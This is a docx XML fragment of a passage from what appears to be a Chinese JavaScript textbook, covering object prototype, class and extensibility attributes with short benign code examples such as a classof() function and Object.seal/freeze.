      <w:r>
        <w:t>6.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　原型属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的原型属性是用来继承属性的（关于原型和原型继承的更多内容请参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节），这个属性如此重要，以至于我们经常把</w:t>
      </w:r>
      <w:r>
        <w:t>“o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>直接叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>原型属性是在实例对象创建之初就设置好的，回想一下</w:t>
      </w:r>
      <w:r>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节提到的，通过对象直接量创建的对象使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>作为它们的原型。通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象使用构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为它们的原型。通过</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象使用第一个参数（也可以是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>）作为它们的原型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，将对象作为参数传入</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>可以查询它的原型。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中，则没有与之等价的函数，但经常使用表达式</w:t>
      </w:r>
      <w:r>
        <w:t>o.construc</w:t>
      </w:r>
      <w:r>
        <w:t>tor.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>来检测一个对象的原型。通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>表达式创建的对象，通常继承一个</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这个属性指代创建这个对象的构造函数。更多细节将会放在</w:t>
      </w:r>
      <w:r>
        <w:t>9.2</w:t>
      </w:r>
      <w:r>
        <w:t>节进一步讨论，</w:t>
      </w:r>
      <w:r>
        <w:t>9.2</w:t>
      </w:r>
      <w:r>
        <w:t>节还解释了使用这种方法来检测对象原型的方式并不可靠的原因。注意，通过对象直接量或</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象包含一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，这个属性指代</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。因此，</w:t>
      </w:r>
      <w:r>
        <w:t>constructor.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>才是对象直接量的真正的原型，但对于通过</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>创</w:t>
      </w:r>
      <w:r>
        <w:t>建的对象则往往不是这样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要想检测一个对象是否是另一个对象的原型（或处于原型链中），请使用</w:t>
      </w:r>
      <w:r>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。例如，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>p.isPrototypeOf(o)</w:t>
      </w:r>
      <w:r>
        <w:t>来检测</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>是否是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p={x:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个原型对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=Object.create(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>使用这个原型创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p.isPrototypeOf(o)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:o</w:t>
      </w:r>
      <w:r>
        <w:t>继承自</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.isPrototypeOf(o)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:p</w:t>
      </w:r>
      <w:r>
        <w:t>继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototy</w:t>
      </w:r>
      <w:r>
        <w:t>pe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>函数实现的功能和</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符非常类似（参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>实现的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>（包括早些年的</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>）对外暴露了一个专门命名为</w:t>
      </w:r>
      <w:r>
        <w:t>__proto__</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，用以直接查询</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>设置对象的原型。但并不推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>__proto__</w:t>
      </w:r>
      <w:r>
        <w:t>，因为尽管</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>的当前版本都支持它，但</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>还未实现它（可能以后也不会实现）。实现了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>版本依然支持</w:t>
      </w:r>
      <w:r>
        <w:t>__proto__</w:t>
      </w:r>
      <w:r>
        <w:t>，但对修改不可扩展</w:t>
      </w:r>
      <w:r>
        <w:t>对象的原型做了限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="6_8_2_Lei_Shu_Xing_"/>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的类属性（</w:t>
      </w:r>
      <w:r>
        <w:t>class attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个字符串，用以表示对象的类型信息。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>都未提供设置这个属性的方法，并只有一种间接的方法可以查询它。默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>）返回了如下这种格式的字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[object class]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>因此，要想获得对象的类，可以调用对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，然后提取已返回字符串的第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>个到倒数第二个位置之间的字符。不过让人感觉棘手的是</w:t>
      </w:r>
      <w:r>
        <w:t>，很多对象继承的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法重写了，为了能调用正确的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>版本，必须间接地调用</w:t>
      </w:r>
      <w:r>
        <w:t>Function.call()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参照</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）。例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>classof()</w:t>
      </w:r>
      <w:r>
        <w:t>函数可以返回传递给它的任意对象的类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>classof()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function classof(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o===null)return"Null";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o===undefined)return"Undefined";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype.toString.call(o).slice(8,-1);</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classof()</w:t>
      </w:r>
      <w:r>
        <w:t>函数可以传入任何类型的参数。数字、字符串和布尔值可以直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就和对象调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>，并且这个函数包含了对</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的特殊处理（在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中不需要对这些特殊情况做处理）。通过内置构造函数（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>）创建的对象包含</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>class attribute</w:t>
      </w:r>
      <w:r>
        <w:t>），它与构造函数名称相匹配。宿主对象也包</w:t>
      </w:r>
      <w:r>
        <w:t>含有意义的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，但这和具体的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现有关。通过对象直接量和</w:t>
      </w:r>
      <w:r>
        <w:t>Obje</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ct.create</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象的类属性是</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
      <w:r>
        <w:t>，那些自定义构造函数创建的对象也是一样，类属性也是</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
      <w:r>
        <w:t>，因此对于自定义的类来说，没办法通过类属性来区分对象的类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(null)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Null"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Number"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof("")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"String"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(false)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Boolean"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof({})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Object</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof([])//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Array"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(/./)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Regexp"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(new Date())//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Date"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(window)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Window"(</w:t>
      </w:r>
      <w:r>
        <w:t>这是客户端宿主对象</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个自定义构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>classof(new f());//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Object"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="6_8_3_Ke_Kuo_Zhan_Xing_"/>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可扩展性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的可扩展性用以表示是否可以给对象添加新属性。所有内置对象和自定义对象都是显式可扩展的，宿主对象的可扩展性是由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎定义的。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，所有的内置对象和自定义对象都是可扩展的，除非将它们转换为不可扩展的，同样，宿主对象的可扩展性也是由实现</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎定义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了用来查询和设置对象可扩展性的函数。通过将对象传入</w:t>
      </w:r>
      <w:r>
        <w:t>Object.esE xtensible()</w:t>
      </w:r>
      <w:r>
        <w:t>，来判断该对象是否是可扩展的。如果想将对象转换为不可扩展的，需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>，将待转换的对象作为参数传进去。注意，一旦将对象转换为不可扩展的，</w:t>
      </w:r>
      <w:r>
        <w:t>就无法再将其转换回可扩展的了。同样需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>只影响到对象本身的可扩展性。如果给一个不可扩展的对象的原型添加属性，这个不可扩展的对象同样会继承这些新属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可扩展属性的目的是将对象</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>锁定</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，以避免外界的干扰。对象的可扩展性通常和属性的可配值性与可写性配合使用，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义的一些函数可以更方便地设置多种属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，除了能够将对象设置为不可扩展的，还可以将对象的所有自有属性都</w:t>
      </w:r>
      <w:r>
        <w:t>设置为不可配置的。也就是说，不能给这个对象添加新属性，而且它已有的属性也不能删除或配置，不过它已有的可写属性依然可以设置。对于那些已经封闭（</w:t>
      </w:r>
      <w:r>
        <w:t>sealed</w:t>
      </w:r>
      <w:r>
        <w:t>）起来的对象是不能解封的。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
      <w:r>
        <w:t>来检测对象是否封闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>将更严格地锁定对象</w:t>
      </w:r>
      <w:r>
        <w:t>——“</w:t>
      </w:r>
      <w:r>
        <w:t>冻结</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>frozen</w:t>
      </w:r>
      <w:r>
        <w:t>）。除了将对象设置为不可扩展的和将其属性设置为不可配置的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>之外，还可以将它自有的所有数据属性设置为只读（如果对象的存取器属性具有</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，存取器属性将不受影响，仍可以通过给属性赋值调用它们）</w:t>
      </w:r>
      <w:r>
        <w:t>。使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isFrozen()</w:t>
      </w:r>
      <w:r>
        <w:t>来检测对象是否冻结。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>都返回传入的对象，也就是说，可以通过函数嵌套的方式调用它们：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个封闭对象，包括一个冻结的原型和一个不可枚举的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=Object.seal(Object.create(Object.freeze({x:1}),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{y:{value:2,writable:true}}));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
